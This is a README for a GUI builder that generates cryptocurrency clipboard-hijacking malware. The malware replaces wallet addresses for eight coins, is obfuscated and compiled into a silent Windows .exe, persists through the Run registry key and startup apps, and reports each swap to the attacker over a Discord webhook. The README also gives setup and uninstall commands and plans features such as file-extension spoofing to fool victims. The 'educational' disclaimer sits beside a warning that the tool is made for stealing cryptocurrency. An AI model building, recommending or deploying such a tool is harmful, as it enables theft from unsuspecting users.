gui features
- written with customtkinter, CTkToolTip, CTkMessagebox and hPyT
- uses pyarmor for obfuscating malware and pyinstaller for compiling to .exe
- allows setting custom icons to the malware .exe
- allows setting custom name for the malware .exe
- has documentation built into the GUI under the documentation tab
malware features
- supports Bitcoin, Ethereum, Litecoin, Monero, Solana, Dogecoin, Ripple, Tron at the same time
- three different types of the same malware but using different methods. subprocess, ctypes and pyperclip
- subprocess uses powershell commands to read and set clipboard - uses python standard libary so no need for the target to install anything
- ctypes uses ctypes to read clipboard and powerhsell to set clipboard - uses python standard libary so no need for the target to install anything
- pyperclip uses the pyperclip module to read and set clipboard - requires the target the run the command pip install pyperclip
- duplicates and adds itself to startup apps for persistence
- has single use method
- allows discord webhook (whenever a address is detected you get a discord notification which says the computer name and that the address has been changed), doesnt need any installs as uses http.client rather than requests to send POST requests to webhook
- option to ping @everyone
- malware saved as .pyw and then compiled to .exe meaning that the malware runs in the background silently
features i will want to add in the future
- self check to avoid multiple instances
- file extention spoofer
- file size pumper
- code within "" and executed with exec()
- another obfuscation method and compile method to choose from
git clone https://github.com/3022-2/raccoon_clipper.git
cd raccoon_clipper
pip install -r requirements.txt
python main.pyw or double click main.pyw
- kill the process in task manager and delete .exe
- run uninstaller.py in uninstaller folder - if there is an error removing registry entry (cant find path) this is fine it means it isnt in startup anyway
you can also manual uninstall
- kill the process in task manager and delete .exe
- goto %appdata%
- delete storage0 folder and CLPPTH folder
- goto Software\Microsoft\Windows\CurrentVersion\Run in registry editor
- delete entry named CLPPTH
DISCLAIMER: The code provided in this repository is intended for educational and malware analysis purposes only. Any use of this code for illegal or unethical activities is strictly prohibited. The author of this code shall not be held responsible for any misuse or damage resulting from its use. Users are solely responsible for ensuring compliance with applicable laws and ethical standards.
WARNING: THIS IS MAKES MALWARE DESIGNED FOR STEALING CRYPTOCURRENCY. USE UNINSTALL GUIDE IF UNINSTALL CODE FAILS. (not found error doesn't necessarily mean didnt uninstall)
discord: cumsock0